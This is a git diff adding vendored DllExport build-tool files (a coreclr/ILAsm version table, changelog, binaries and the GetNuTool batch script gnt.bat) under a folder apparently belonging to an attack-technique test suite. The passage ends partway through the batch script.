diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/_Version.txt b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/_Version.txt
new file mode 100644
index 00000000..c2198013
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/_Version.txt
@@ -0,0 +1,10 @@
+
+Architecture | Platform | Config | commit-sha1 | ILD/Asm | coreclr | Path
+-------------|----------|---------|------------------------------------------|---------------------------|---------|-------------
+x86 | Windows | Release | 05afa4f81fdf671429b54467c64d65cde6b5fadc | [ 4.5.1 ] -> *4.5.22220.0 | *v1.0.4 | \bin\Win.x86\
+x64 | Windows | Release | 05afa4f81fdf671429b54467c64d65cde6b5fadc | [ 4.5.1 ] -> *4.5.22220.0 | *v1.0.4 | \bin\Win.x64\
+
+`* - The base of version, i.e. it can be different from official release`
+
+https://github.com/3F/coreclr
+
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/changelog.txt b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/changelog.txt
new file mode 100644
index 00000000..113dd884
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/changelog.txt
@@ -0,0 +1,26 @@
+https://github.com/3F/coreclr
+- - - - - - - - - - - - - - - -
+
+# coreclr \ ILAsm
+
+[v4.5.1]
+
+ * FIXED: Fixed using of cvtres (.res -> obj COFF-format) in mscorpe.
+ Possible crash: https://github.com/3F/coreclr/issues/2
+ Related Issue: https://github.com/3F/DllExport/issues/17
+
+ * NEW: Implemented additional searching of the converters of resources:
+ Environment PATH, local directory, and other additional from user path.
+ Now it also can be wrapped like ` mytool.cmd -> cvtres.exe %* ` etc.
+
+ * NEW: Added new /CVRES (/CVR) key to ilasm.exe
+ `/CVRES= Set path to cvtres tool: /CVR=cvtres.exe /CVR=tool\cvtres.cmd /CVR=D:\tool\`
+
+ * NOTE: based on 4.5.22220.0 / coreclr 1.0.4
+ ^ ^ ^ ^
+ | | | |-- VER_FILEVERSIONREVISION
+ | | |------- VER_FILEVERSIONBUILD
+ | |---------- VER_FILEVERSIONMINOR
+ |------------ VER_MAJORVERSION
+
+
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/coreclr.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/coreclr.dll
new file mode 100644
index 00000000..08a6d5e0
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/coreclr.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/ilasm.exe b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/ilasm.exe
new file mode 100644
index 00000000..0289b6e4
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/ilasm.exe differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/ildasm.exe b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/ildasm.exe
new file mode 100644
index 00000000..c61b6a26
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/ildasm.exe differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/ildasmrc.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/ildasmrc.dll
new file mode 100644
index 00000000..7f42d52b
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/ildasmrc.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/mscordaccore.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/mscordaccore.dll
new file mode 100644
index 00000000..2730505b
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/mscordaccore.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/mscordbi.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/mscordbi.dll
new file mode 100644
index 00000000..b6de6f3b
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/mscordbi.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/gnt.bat b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/gnt.bat
new file mode 100644
index 00000000..82b358b7
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/gnt.bat
@@ -0,0 +1,59 @@
+@echo off
+:: GetNuTool - Executable version
+:: Copyright (c) 2015-2016 Denis Kuzmin [ entry.reg@gmail.com ]
+:: https://github.com/3F/GetNuTool
+
+set gntcore=gnt.core
+set tgnt="%temp%\%random%%random%%gntcore%"
+
+set args=%*
+set a=%args:~0,30%
+set a=%a:"=%
+
+if "%a:~0,7%"=="-unpack" goto unpack
+if "%a:~0,8%"=="-msbuild" goto ufound
+
+for %%v in (14.0, 12.0, 15.0, 4.0, 3.5, 2.0) do (
+ for /F "usebackq tokens=2* skip=2" %%a in (
+ `reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSBuild\ToolsVersions\%%v" /v MSBuildToolsPath 2^> nul`
+ ) do if exist %%b (
+ set msbuild="%%b\msbuild.exe"
+ goto found
+ )
+)
+echo MSBuild was not found, try: gnt -msbuild "fullpath" args 1>&2
+goto exit
+
+
+:ufound
+call :popa %1
+shift
+set msbuild=%1
+call :popa %1
+
+:found
+call :core
+%msbuild% %tgnt% /nologo /p:wpath="%~dp0/" /v:m %args%
+del /Q/F %tgnt%
+goto exit
+
+:popa
+call set args=%%args:%1^=%%
+exit /B 0
+
+:unpack
+set tgnt=%~dp0\%gntcore%
+echo Generate minified version in %tgnt% ...
+
+:core
+%tgnt%
+^